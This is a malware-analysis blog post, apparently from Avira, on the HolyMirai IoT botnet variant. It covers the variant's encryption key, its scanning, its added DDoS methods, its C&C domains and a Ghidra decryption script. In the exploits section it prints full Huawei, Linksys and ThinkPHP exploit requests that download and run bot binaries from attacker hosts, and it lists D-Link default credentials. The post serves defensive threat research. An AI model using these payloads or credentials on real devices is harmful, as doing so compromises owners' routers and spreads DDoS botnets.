The evolution of Mirai into HolyMirai

By October 2016, the Mirai botnet had infected over 500,000 IoT devices. The massive distributed denial of service (DDoS) attack on the dynamic DNS service Dyn, and several  high-profile services including Krebs on Security,  generated more than 1Tbps of traffic. For many in the world, internet services were temporarily disrupted.

This remarkable attack was carried out via unsecured, innocuous Internet-of-Things (IoT) devices like home routers, air-quality monitors, and personal surveillance cameras. And the IoT industry learnt a lesson; a lesson that it has yet to apply in practice.

Mirai botnets remain active today. However, the code has evolved into a new form, one that Avira researchers have named HolyMirai.

This blog will present a study of the core similarities, differences, and evolution of the original Mirai and its new variant, HolyMirai. A follow up blog will describe another evolution of HolyMirai along with new C&C servers.

Introduction

Avira develops threat intelligence for many applications. The Avira Protection Labs uses many techniques to develop this intelligence, not all of which are public. However, one method is honeypots, and one of these targets IoT binaries.

The Avira Protection Labs IoT honeypot captures and identifies many new and unique forms of malware each day. The vast majority are modified variants of the original Mirai. This should not be surprising given how popular Mirai became after the leak of its source code, just a year after the original attack.

Among the recently captured pieces of malware, which are all part of active botnets, we found seven samples all containing a flashy string “compiled using cia holyc compiler” – a tongue-in-cheek reference to HolyC programming language and its author Terry A. Davis.

We wrote Yara rules to hunt similar samples that contained the same string, on VT and found 36 more variants. Considering the author’s sense of humor, we decided to name it HolyMirai.

Evolution – Core findings/differences with the original Mirai

1. Custom Encryption Method(Same as MiraiCrush)
2. Aggressive Scanning
3. Additional DDoS techniques
4. Adopting different exploits for targeted devices or lateral movement

As shown in the versions table below the authors forgot to strip two samples with the SHA hashes of

c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde

and

cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 

before releasing them into the wild. As a result, they both came with debugging information which makes reverse engineering much easier. We selected these two samples as our primary target, though also considered other samples, especially where they differed from their parent version and where they are customized.

After looking into the samples, of HolyMirai, we observed some significant similarities with the original Mirai code and Hakai malware though with notable customized features and improvements.

General Analysis

In this section, we explain the common features shared with all samples in our analysis set.

What is the deal with the flashy string?

As mentioned before, all samples contain a flashy string “compiled using cia holyc compiler“.  This string is used as a parameter in “inet_addr” to create a fake IP address for the C&C Server, the intent to mislead malware analysts.

As useless as it seemed, it was still a good hanger with which to classify the malware and hunt other variants.

Encryption method:

Although the encryption method seen in these samples are different to the original Mirai’s, it is the same routine previously observed in MiraiCrush. The only difference is the encryption key which is 0xDEADDAAD instead of  0xDEDEFFBA used by MiraiCrush.

Aggressive Scanning:

Below is the screenshot of the original Mirai source code. As shown in the last line, one instance of the scanner is initiated when malware is executed.

However, as shown in the screenshot below, HolyMirai instantiates multiple scanners (in this case 4 instances), making the scanning process much faster and more aggressive, eventually leading to the wider spread of the botnet.

Additional DDoS techniques:

Aside from the Mirai attack methods that exist in HolyMirai, there are additional DDoS methods including:

1. Christmas tree attack
2. TCP URG SYN attack
3. TCP ACK SYN attack
4. TCP ALL attack (All TCP flags are set)
5. Two random UDP attacks (the first version creates a string of length 1 to 31 and the second version creates a random string of length 100 to 800 characters)First version:
   
   Second version:
   

Exploits

HolyMirai has evolved over time. In this section, we will present some unique exploits that we found in individual samples of HolyMirai which are not present in the earlier versions.

CVE-2017-17215 – Huawei Home Device Upgrade exploit

Found in the sample with  SHA256 hash of d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e, this exploit target Huawei home routers. This was also present in MiraiCrush

Huawei Exploit

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

<?xml version=”1.0″ ?><s:Envelope xmlns:s=”https://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”https://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm; /bin/busybox chmod 777 * /tmp/ggy; /tmp/ggy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

note the payload:

/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm;

/bin/busybox chmod 777 * /tmp/ggy;

/tmp/ggy huawei

Linksys the “Moon” worm exploit

Found in the sample with  SHA256 hash of d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e, This exploit target the linksys modems and it is first seen in the "Moon" worm.

Linksys Exploit

POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.arm7plz.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1..

note the payload:

cd /tmp;

rm -rf set.mpsl;

wget https://cnc.arm7plz.xyz/bins/set.mpsl;

chmod 777 set.mpsl;

./set.mpsl linksys

ThinkPHP 5.x RCE exploit

Found in the sample with  SHA256 hash of 3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999, This exploits a flaw in ThinkPHP application.

ThinkPHP Exploit

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20https://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1
Host: 127.0.0.1
User-Agent: Sefa
Accept: */*
Accept-Language: en-US,en;q=0.8
Connection: Keep-Alive

note the payload:

cd /tmp;

wget https://cnc.junoland.xyz/bins/egg.x86;

cat egg.x86 > lzrd;

chmod 777 lzrd;

./lzrd thinkphp.x86

Targeted devices

In this section we present targeted attacks against specific vendors and devices

1. Huawei (exploit shown above)
2. Linksys (exploit shown above)
3. D-Link (exploit shown below)

Targeting D-Link:

Scanner module of the HolyMirai with the SHA256 hash of 153964ee69c1a5e8aa16eb454778baf2f3190ee539b05ca798710b1642cfc90a contains D-link default passwords, which is not present in the original Mirai source code.

D-Link Default username & passwords

Alphanetworks wrgg19_c_dlwbr_dir300
Alphanetworks wrgn49_dlob_dir600b
Alphanetworks wrgn23_dlwbr_dir600b
Alphanetworks wrgn22_dlwbr_dir615
Alphanetworks wrgnd08_dlob_dir815
Alphanetworks wrgg15_di524
Alphanetworks wrgn39_dlobhans_dir645
Alphanetworks wapnd03cm_dkbs_dap2555
Alphanetworks wapnd04cm_dkbs_dap3525
Alphanetworks wapnd15_dlob_dap1522b
Alphanetworks wrgac01_dlob.hans_dir865
Alphanetworks wrgn23_dlwbr_dir300b
Alphanetworks wrgn28_dlob_dir412
Alphanetworks wrgn39_dlob.hans_dir645_V1

Additional info

List of different HolyMirai variants:

List of C&C servers 

C&C Servers (all versions included)

netflux.r00ts.online
hulo.r00ts.online
netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
drum.aydenjonza.xyz
storage.aydenjonza.xyz
cnc.arm7plz.xyz
scan.arm7plz.xyz
cnc.junoland.xyz
scan.junoland.xyz

Ghidra script to decrypt strings:

# This script helps to extract and decrypt strings in HolyMirai
#@author Hamidreza Ebtehaj
#@category _NEW_
#@keybinding
#@menupath Tools.Misc.MiraiString
#@toolbar

number_of_hits = 100
xor_key = 0x4
start = currentAddress
separators = list(findBytes(currentAddress, “\\x04\\x00”, number_of_hits, 1))
separators += list(findBytes(currentAddress, “\\x00\\x00″, number_of_hits, 1))
separators.sort()

num = 1
for off in separators:
if start >= off:
continue
# Decrypting strings
bts = getBytes(start, off.subtract(start))
for i in range(len(bts)):
bts[i] ^= xor_key
hex_str = ” “.join([“%02X” % x for x in bts])
str = “”.join([“%c” % x for x in bts if x < 0x80 and x > 0x1f])
# print (“%02x %s : %s %s” % (num, start, str , hex_str))
print (“%s” % str)
# Getting next address
start = off
while getByte(start) == 4 or getByte(start) == 0:
start = start.next()
num += 1